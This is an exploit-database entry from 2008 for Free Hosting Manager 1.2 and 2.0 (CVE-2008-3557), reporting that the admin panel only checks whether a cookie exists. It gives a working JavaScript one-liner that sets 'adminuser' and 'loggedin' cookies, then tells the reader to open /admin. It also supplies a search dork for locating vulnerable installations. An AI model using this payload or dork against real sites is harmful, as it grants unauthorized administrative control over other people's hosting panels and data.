Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling
Author: Scary-Boys
type: webapps
platform: php
port:
date_added: 2008-08-05
date_updated:
verified: 1
codes: OSVDB-47531;CVE-2008-3557
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
# #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
# #
#########################################################################
# #
# AUTHOR : Scary-Boys #
# HOME : http://scary-boys.com #
# Founded By : lvlr-Erfan #
# Download : http://www.fhm-script.com/download.php #
# #
#########################################################################
# #
# DorKs : "Powered By Free Hosting Manager" #
# #
#########################################################################
# #
# DESCRIPTION : #
# the admin panel only checks if the cookie exists. #
# #
#########################################################################
# #
# Vulnerability : #
# #
# javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
# #
#########################################################################
# #
# after running the javascript, Go to "/admin" & Refresh #
# #
#########################################################################
# milw0rm.com [2008-08-06]